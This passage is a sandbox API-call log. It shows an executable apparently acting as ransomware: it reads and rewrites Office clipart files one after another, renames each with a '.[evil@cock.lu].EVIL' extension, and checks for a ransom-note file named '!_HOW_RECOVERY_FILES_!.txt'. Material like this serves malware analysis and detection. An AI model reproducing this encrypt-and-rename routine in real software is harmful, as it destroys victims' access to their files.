lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x36b8, lpOverlapped=0x0) returned 1 [0144.782] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.782] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.783] _errno () returned 0x84b1160840 [0144.783] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.783] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x36c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x36c0, lpOverlapped=0x0) returned 1 [0144.783] CloseHandle (hObject=0x1a8) returned 1 [0144.783] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.783] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.783] __uncaught_exception () returned 0x84b1160800 [0144.783] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.783] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107516.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107516.wmf.[evil@cock.lu].evil")) returned 1 [0144.784] ??_V@YAXPEAX@Z () returned 0x1 [0144.787] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF", dwFileAttributes=0x200) returned 0 [0144.787] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.787] wcsstr (_Str="J0107526.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.787] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF") returned 69 [0144.787] wcscmp (_String1="J0107526.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.787] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107526.WMF") returned 0x0 [0144.787] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF") returned 0x45 [0144.787] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107526.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.790] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1f0c, lpOverlapped=0x0) returned 1 [0144.792] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.792] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.792] _errno () returned 0x84b1160840 [0144.792] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.792] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1f20, lpOverlapped=0x0) returned 1 [0144.792] CloseHandle (hObject=0x1a8) returned 1 [0144.792] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.793] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.793] __uncaught_exception () returned 0x84b1160800 [0144.793] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.793] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107526.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107526.wmf.[evil@cock.lu].evil")) returned 1 [0144.794] ??_V@YAXPEAX@Z () returned 0x1 [0144.797] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF", dwFileAttributes=0x200) returned 0 [0144.798] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.798] wcsstr (_Str="J0107528.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.798] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF") returned 69 [0144.798] wcscmp (_String1="J0107528.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.798] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107528.WMF") returned 0x0 [0144.798] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF") returned 0x45 [0144.798] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107528.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.800] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1a88, lpOverlapped=0x0) returned 1 [0144.804] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.804] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.804] _errno () returned 0x84b1160840 [0144.804] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.804] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1aa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1aa0, lpOverlapped=0x0) returned 1 [0144.804] CloseHandle (hObject=0x1a8) returned 1 [0144.804] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.804] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.804] __uncaught_exception () returned 0x84b1160800 [0144.804] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.805] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107528.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107528.wmf.[evil@cock.lu].evil")) returned 1 [0144.805] ??_V@YAXPEAX@Z () returned 0x1 [0144.808] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF", dwFileAttributes=0x200) returned 0 [0144.808] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.808] wcsstr (_Str="J0107544.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.808] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF") returned 69 [0144.808] wcscmp (_String1="J0107544.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.808] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107544.WMF") returned 0x0 [0144.808] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF") returned 0x45 [0144.808] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107544.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.810] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6890, lpOverlapped=0x0) returned 1 [0144.824] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.824] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.824] _errno () returned 0x84b1160840 [0144.824] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.824] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x68a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x68a0, lpOverlapped=0x0) returned 1 [0144.824] CloseHandle (hObject=0x1a8) returned 1 [0144.825] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.825] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.825] __uncaught_exception () returned 0x84b1160800 [0144.825] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.825] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107544.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107544.wmf.[evil@cock.lu].evil")) returned 1 [0144.826] ??_V@YAXPEAX@Z () returned 0x1 [0144.830] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF", dwFileAttributes=0x200) returned 0 [0144.830] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.830] wcsstr (_Str="J0107658.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.830] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107658.WMF") returned 69 [0144.830] wcscmp (_String1="J0107658.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.830] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107658.WMF") returned 0x0 [0144.830] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107658.WMF") returned 0x45 [0144.830] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107658.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107658.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.833] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1ba0, lpOverlapped=0x0) returned 1 [0144.865] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.865] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.865] _errno () returned 0x84b1160840 [0144.865] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.865] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x1bc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1bc0, lpOverlapped=0x0) returned 1 [0144.865] CloseHandle (hObject=0x1a8) returned 1 [0144.865] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107658.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.866] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.866] __uncaught_exception () returned 0x84b1160800 [0144.866] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.866] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107658.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107658.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107658.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107658.wmf.[evil@cock.lu].evil")) returned 1 [0144.867] ??_V@YAXPEAX@Z () returned 0x1 [0144.870] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107658.WMF", dwFileAttributes=0x200) returned 0 [0144.871] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.871] wcsstr (_Str="J0107708.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.871] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF") returned 69 [0144.871] wcscmp (_String1="J0107708.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.871] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107708.WMF") returned 0x0 [0144.871] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF") returned 0x45 [0144.871] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107708.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.873] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x12c8, lpOverlapped=0x0) returned 1 [0144.880] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.880] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.880] _errno () returned 0x84b1160840 [0144.880] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.880] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x12e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x12e0, lpOverlapped=0x0) returned 1 [0144.881] CloseHandle (hObject=0x1a8) returned 1 [0144.881] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.881] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.881] __uncaught_exception () returned 0x84b1160800 [0144.881] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.881] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107708.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107708.wmf.[evil@cock.lu].evil")) returned 1 [0144.882] ??_V@YAXPEAX@Z () returned 0x1 [0144.885] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107708.WMF", dwFileAttributes=0x200) returned 0 [0144.886] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.886] wcsstr (_Str="J0107712.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.886] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107712.WMF") returned 69 [0144.886] wcscmp (_String1="J0107712.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.886] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107712.WMF") returned 0x0 [0144.886] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107712.WMF") returned 0x45 [0144.886] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107712.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107712.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.888] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x121c, lpOverlapped=0x0) returned 1 [0144.891] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.891] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.891] _errno () returned 0x84b1160840 [0144.891] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.891] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1220, lpOverlapped=0x0) returned 1 [0144.892] CloseHandle (hObject=0x1a8) returned 1 [0144.892] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107712.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.892] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.892] __uncaught_exception () returned 0x84b1160800 [0144.892] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.892] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107712.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107712.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107712.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107712.wmf.[evil@cock.lu].evil")) returned 1 [0144.893] ??_V@YAXPEAX@Z () returned 0x1 [0144.897] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107712.WMF", dwFileAttributes=0x200) returned 0 [0144.897] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.897] wcsstr (_Str="J0107718.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.897] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF") returned 69 [0144.897] wcscmp (_String1="J0107718.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.897] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107718.WMF") returned 0x0 [0144.897] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF") returned 0x45 [0144.897] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107718.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.899] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xed8, lpOverlapped=0x0) returned 1 [0144.902] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.902] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.902] _errno () returned 0x84b1160840 [0144.902] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.902] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xee0, lpOverlapped=0x0) returned 1 [0144.902] CloseHandle (hObject=0x1a8) returned 1 [0144.903] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0144.903] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0144.903] __uncaught_exception () returned 0x84b1160800 [0144.903] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0144.903] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107718.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107718.wmf.[evil@cock.lu].evil")) returned 1 [0144.904] ??_V@YAXPEAX@Z () returned 0x1 [0144.908] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF", dwFileAttributes=0x200) returned 0 [0144.908] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0144.909] wcsstr (_Str="J0107722.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0144.909] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF") returned 69 [0144.909] wcscmp (_String1="J0107722.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0144.909] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107722.WMF") returned 0x0 [0144.909] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF") returned 0x45 [0144.909] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107722.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0144.911] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2044, lpOverlapped=0x0) returned 1 [0144.915] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.915] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0144.915] _errno () returned 0x84b1160840 [0144.915] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.915] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, 